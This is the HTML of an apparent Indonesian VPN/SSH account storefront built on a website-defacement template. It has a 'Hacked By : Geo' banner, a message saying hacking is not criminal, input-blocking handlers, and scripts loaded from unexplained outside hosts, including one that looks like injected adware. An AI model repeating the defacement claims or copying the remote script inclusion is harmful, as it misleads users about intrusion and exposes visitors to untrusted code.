<html>
<head><script src="http://masterendi.googlecode.com/files/salju.js"></script><script type="text/javascript" src="http://apiwebspadesinfo-a.akamaihd.net/gsrs?is=fmxqtid&bp=PB&g=1c83c707-6e9c-4b09-884c-3bbc7f641e35" ></script></head>
<title>Geo VPN Store</title>
<body background="http://mein-fun.com/data/media/5/hacked_gif.gif">
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js" type="text/javascript"></script> 
<style>
body{ 
background-color: #000000;
background-repeat:no-repeat;
background-attachment:fixed;
background-position:center; 
font-family: GEO; 
font-size: 27px;
}
h1 {
padding: 10px 15px;
margin: 0px;
font-size: 14px;
background-color: #000000;
//background-image: -moz-linear-gradient(100% 100% 90deg, #777, #999) !important;
//background-image: -webkit-gradient(linear, 0% 0%, 0% 100%, from(#999), to(#777)) !important;
color: #FFF;
//-webkit-border-radius:8px 8px 0px 0px;
//-moz-border-radius: 8px 8px 0px 0px;
border-radius: 8px 8px 0px 0px;
text-shadow:1px 1px 2px #333333;
opacity: 0.5;
}
table {
width: 565px;
}
table tr td{
font-family: verdana;
font-size: 11px;
padding: 10px 5px;
border-bottom: solid 1px #CCC;

}
#wrapper{
width: 800px;
margin: 10px auto;
text-align: left;
background: url('https://fbcdn-sphotos-b-a.akamaihd.net/hphotos-ak-prn1/1378227_577135182334975_111888418_n.jpg') no-repeat center center fixed ;
}
#console{
height: 400px;
overflow: auto;
background-color: #000;
padding: 15px;
font-family: monospace;
font-size: 12px;
color: #FFF;
}
.content{
padding: 15px;
}
#commander{
border: solid 1px #CCC;
padding: 5px 10px;
-webkit-border-radius: 2px;
-moz-border-radius: 2px;
border-radius: 2px;
margin: 5px;
width: 590px;
height: 30px;
}
.box{
-moz-box-shadow: 1px 1px 8px #666;
-webkit-box-shadow: 1px 1px 8px #666;
box-shadow: 1px 1px 8px #40D5D2;
border: solid 1px black;
-webkit-border-radius: 8px 8px 0px 0px;
-moz-border-radius: 8px 8px 0px 0px;
border-radius: 8px 8px 0px 0px;
margin: 15px 0px;
background-color: #F5F5F5;
opacity: 0.8;
}
#help{
width: 300px;
float: right;
}
.prefix{
color: #0077E7;
}
.keyword{
color: #9eff63;
}
.error{
color: #FF0000;
}
.spacer{
clear: both;
display: block;
}
</style>
<script type="text/javascript">
// Hacked By : Geo
TypingText = function(element, interval, cursor, finishedCallback) {
if((typeof document.getElementById == "undefined") || (typeof 

element.innerHTML == "undefined")) {
this.running = true;
return;
}
this.element = element;
this.finishedCallback = (finishedCallback ? finishedCallback : function() { 

return; });
this.interval = (typeof interval == "undefined" ? 100 : interval);
this.origText = this.element.innerHTML;
this.unparsedOrigText = this.origText;
this.cursor = (cursor ? cursor : "");
this.currentText = "";
this.currentChar = 0;
this.element.typingText = this;
if(this.element.id == "") this.element.id = "typingtext" + 

TypingText.currentIndex++;
TypingText.all.push(this);
this.running = false;
this.inTag = false;
this.tagBuffer = "";
this.inHTMLEntity = false;
this.HTMLEntityBuffer = "";
}
TypingText.all = new Array();
TypingText.currentIndex = 0;
TypingText.runAll = function() {
for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run();
}
TypingText.prototype.run = function() {
if(this.running) return;
if(typeof this.origText == "undefined") {
setTimeout("document.getElementById('" + this.element.id + 

"').typingText.run()", this.interval);
return;
}
if(this.currentText == "") this.element.innerHTML = "";
if(this.currentChar < this.origText.length) {
if(this.origText.charAt(this.currentChar) == "<" && !this.inTag) {
this.tagBuffer = "<";
this.inTag = true;
this.currentChar++;
this.run();
return;
} else if(this.origText.charAt(this.currentChar) == ">" && this.inTag) {
this.tagBuffer += ">";
this.inTag = false;
this.currentText += this.tagBuffer;
this.currentChar++;
this.run();
return;
} else if(this.inTag) {
this.tagBuffer += this.origText.charAt(this.currentChar);
this.currentChar++;
this.run();
return;
} else if(this.origText.charAt(this.currentChar) == "&" && !

this.inHTMLEntity) {
this.HTMLEntityBuffer = "&";
this.inHTMLEntity = true;
this.currentChar++;
this.run();
return;
} else if(this.origText.charAt(this.currentChar) == ";" && 

this.inHTMLEntity) {
this.HTMLEntityBuffer += ";";
this.inHTMLEntity = false;
this.currentText += this.HTMLEntityBuffer;
this.currentChar++;
this.run();
return;
} else if(this.inHTMLEntity) {
this.HTMLEntityBuffer += this.origText.charAt(this.currentChar);
this.currentChar++;
this.run();
return;
} else {
this.currentText += this.origText.charAt(this.currentChar);
}
this.element.innerHTML = this.currentText;
this.element.innerHTML += (this.currentChar < this.origText.length - 1 ? 

(typeof this.cursor == "function" ? this.cursor(this.currentText) : this.cursor) : 

"");
this.currentChar++;
setTimeout("document.getElementById('" + this.element.id + 

"').typingText.run()", this.interval);
} else {
this.currentText = "";
this.currentChar = 0;
this.running = false;
this.finishedCallback();
}
}
</script>


<!-- AdFender script begin --><script type='text/javascript' src='http://local.adfender.com/adfender/elemhide.js'></script><!-- AdFender script end -->
<!-- AdFender script begin --><script type='text/javascript' src='http://local.adfender.com/adfender/elemhide.js'></script><!-- AdFender script end -->
</head>
<body oncontextmenu='return false;' onkeydown='return false;' onmousedown='return false;' ondragstart='return false' onselectstart='return false' style='-moz-user-select: none; cursor: default;'>
<br/><br/>
<div id="wrapper">
<div class="box">
<h1>Root~</h1>
<div id="console"><span class="prefix">
<p id="message">
<font color="red"size="5px">root@Geo:</font><font color="white"size="5px"> Hai Bang !! <br>
<font color="red"size="5px">root@Geo:</font><font color="white"size="5px"> Mau Ngapain Buka Web Ini ?<br>
<font color="red"size="5px">root@Geo:</font><font color="white"size="5px"> Nyari Resource Script ya<br>
<font color="red"size="5px">root@Geo:</font><font color="white"size="5px"> Ga Ada yg gratis Bang maaf :(<br>
<font color="red"size="5px">root@Geo:</font><font color="white"size="5px"> kalo mau beli Script<br>
<font color="red"size="5px">root@Geo:</font><font color="white"size="5px"> kalo mau sewah Script :(<br>
<font color="red"size="5px">root@Geo:</font><font color="white"size="5px"> Kalo mau Beli VPS dan akun VPN<br>
<font color="red"size="5px">root@Geo:</font><font color="white"size="5px"> Chat aja saya di telegram dan WA :(<br>
<font color="red"size="5px">root@Geo:</font><font color="white"size="5px"> Telegram : <font color="yellow" size="3px">@sampiiiiu</font><br>
<font color="red"size="5px">root@Geo:</font><font color="white"size="5px"> Whatsapp : <font color="yellow" size="3px">082339191527</font><br>
<font color="red"size="5px">root@Geo:</font><font color="white"size="5px"> Channel testimoni : <font color="yellow" size="3px">@testikuy_mang</font><br>
<br>
<font color="yellow" size="5px">[+] Script by Geo Gabut </font><br>
<font color="white">[+] Message : Remember this, There is not perfect security in the world..
We are only testing your security on your site..Hacking is not criminal.. but Hacking is art<br>
We are <font color="yellow" size="3px">Geo Gabut</font> <br>
We are United<br>
We are Legion<br>
We do not forgive<br>
We do not forget<br>
Expect us<br>
<br>

<font color="blue">[+] Credit : Geo Gabut | NO SYSTEM IS SAFE <br/>
<br>
<font color="blue">[+] SALAM SANTUY DARI NTB<br>
<br>
<font color="cyan">GEO ANAK NTB<br>
<script type="text/javascript">
new TypingText(document.getElementById("message"), 50, function(i){ var ar 

= new Array("|", "|", "|", "|"); return " " + ar[i.length % ar.length]; });

//Type out examples:
TypingText.runAll();

</script>
<input text="test" id="commander" onkeyup="execute(this,event);" disabled="disabled" style="width:786px;"/>
</div>
<div class="spacer"></div>
<embed
src="https://www.youtube.com/v/Zovp-HtXIpw&autoplay=1&loop=1"
type="application/x-shockwave-flash" wmode="transparent" height="1"
width="1">
<center><b></font><font color="#ff0000"><i><p><a href="index.html"></a> <span><h1>GEO VPN STORE<br></h1></span></p>
<br>
<center><a href="https://t.me/sampiiiiu" target="blank"><img align="center" src="https://www.pinclipart.com/picdir/middle/374-3744565_telegram-logo-clipart.png" alt="dasun_pamod" height="80" width="80" /></a> &nbsp;&nbsp;
<a href="https://www.instagram.com/geogabut/" target="blank"><img align="center" src="https://www.net-aware.org.uk/siteassets/images-and-icons/application-icons/app-icons-instagram.png?w=585&scale=down" alt=" height="70" width="70" />
<a href="https://wa.me/6282339191527?text=Bang+Beli+AKUN+SSH+SGDO+DONG" target="blank"><img align="center" src="https://www.net-aware.org.uk/siteassets/images-and-icons/application-icons/app-icons-whatsapp.png?w=585&scale=down" alt=" height="70" width="70" />
<br>
<a href="https://www.facebook.com/sedang.aktif.52459" target="blank"><img align="center" src="https://upload.wikimedia.org/wikipedia/commons/5/51/Facebook_f_logo_%282019%29.svg" alt="height="70" width="70" /></a> &nbsp;&nbsp;
<a href="https://github.com/geogabut" target="blank"><img align="center" src="https://www.influxdata.com/wp-content/uploads/GitHub-logo.jpg" alt="Dasun Pamod" height="70" width="70" /></a> &nbsp;&nbsp;
<a href="https://mail.google.com/mail/?view=cm&fs=1&tf=1&to=paoandest@gmail.com" target="blank"><img align="center" src="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/Gmail.max-1100x1100.png" alt="height="70" width="70" /><br>

</font><font color="#EE82EE"><i><u>Installer Script Premium Teta Geo</u><br>
<br>


<!DOCTYPE html>
<html lang="en">

  <head>

    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="description" content="">
    <meta name="author" content="TemplateMo">
    <link href="https://fonts.googleapis.com/css?family=Roboto:100,300,400,500,700" rel="stylesheet">

    </font><font color="#2fc8ff"><i><title>PREMIUM SERVER</title>


    <link href="vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">


    <link rel="stylesheet" href="assets/css/fontawesome.css">
    <link rel="stylesheet" href="assets/css/templatemo-host-cloud.css">
    <link rel="stylesheet" href="assets/css/owl.css">
    
    <style type="text/css">
    h4 {
        font-size: 25px;
    }
    input[type="text"],
    button[type="button"] {
        padding: 10px 15px;
        font-size: 16px;
        border-radius: 5px;
    }
    input[type="text"] {  	
        box-shadow: 0px 0px 10px rgba(0,0,0,0.1);
	    border-radius: 15px;
	    padding: 30px;
        width: 200px;
        border: 1px solid #7aac42;
    }
    button[type="button"] {
        background: #7aac42;
        border: 1px solid #fff;
        color: #fff;
        cursor: pointer;
    }
</style>
    
  </head>
  
  <script>
  	
</script>
  
  <body>

    <div id="preloader">
        <div class="jumper">
            <div></div>
            <div></div>
            <div></div>
        </div>
    </div>  

<div class="page-heading header-text">
      <div class="container">
        <div class="row">
          <div class="col-md-12">
            <p><a href="index.html"></a> <span><h1>GEO GABUT</h1></span></p>
            
</div>
</div>  
</div>
          <div class="col-md-3 col-sm-6 col-xs-12">
            <div class="footer-item">
              <div class="footer-heading">
                </font><font color="#ffd700"><i><h2>Service VPN Tersedia</h2>
              </div>
              <ul class="footer-list">
                <li><a href="https://wa.me/6282339191527?text=Bang+Beli+SSH+SGDO">SSH & OpenVPN</a></li>
                <li><a href="https://wa.me/6282339191527?text=Bang+Beli+SSH+WS+SGDO">SSH WebSocket</a></li>
                <li><a href="https://wa.me/6282339191527?text=Bang+Beli+Shadowsocks+SGDO">Shadowsocks</a></li>
                <li><a href="https://wa.me/6282339191527?text=Bang+Beli+SSR+SGDO">ShadowsocksR</a></li>
                <li><a href="https://wa.me/6282339191527?text=Bang+Beli+VMESS+SGDO">V2ray Vmess</a></li>
                <li><a href="https://wa.me/6282339191527?text=Bang+Beli+VLESS+SGDO">V2ray Vless</a></li>
                <li><a href="https://wa.me/6282339191527?text=Bang+Beli+Trojan+SGDO">V2ray Trojan</a></li>
              </ul>
            </div>
          </div>
         
         <div class="col-md-3 col-sm-6 col-xs-12">
            <div class="footer-item">
              <div class="footer-heading">
                </font><font color="#36ff26"><i><h2>Metode Pembayaran</h2>
              </div>
              <ul class="footer-list">
                <li><a href="#">DANA</a></li>
                <li><a href="#">OVO</a></li>
                <li><a href="#">Gopay</a></li>
                <li><a href="#">LinkAja</a></li>
                <li><a href="#">Pulsa +5</a></li>
              </ul>
            </div>
          </div>
         
          <div class="col-md-3 col-sm-6 col-xs-12">
            <div class="footer-item">
              <div class="footer-heading">
                </font><font color="#2fc8ff"><i><h2>Info Lengkap Hubungi</h2>
              </div>
              <ul class="footer-list">
            	</font><font color="cyan"><u><b><li>Telegram: <a href="https://t.me/sampiiiiu">@sampiiiiu</a></li>
            	</font><font color="cyan"><u><b><li>WhatsApp: <a href="https://wa.me/6282339191527">+62 823-3919-1527</a></li>
              </ul>
            </div>
          </div>  
          
          <div class="col-md-12">
          <div class="sub-footer">
              </font><font color="#FA8072"><i><p>Copyright 2021 | <a rel="nofollow" href="https://t.me/sampiiiiu">GEO GABUT</p>
            </div>
          </div>
        </div>
      </div>
    </footer>
    
<script type="text/javascript">
    function copy_text() {
        document.getElementById("pilih").select();
        document.execCommand("copy");
        alert("Payload Berhasil Dicopy Ke Clipboard!");
    }
</script>

    <script src="vendor/jquery/jquery.min.js"></script>
    <script src="vendor/bootstrap/js/bootstrap.bundle.min.js"></script>

    <script src="assets/js/custom.js"></script>
    <script src="assets/js/owl.js"></script>
    <script src="assets/js/accordions.js"></script>


    <script language = "text/Javascript">  
      cleared[0] = cleared[1] = cleared[2] = 0; 
      function clearField(t){ 
      if(! cleared[t.id]){ 
          cleared[t.id] = 1;  
          t.value=''; 
          t.style.color='#fff';
          }
      }
    </script>

  </body>
</html>
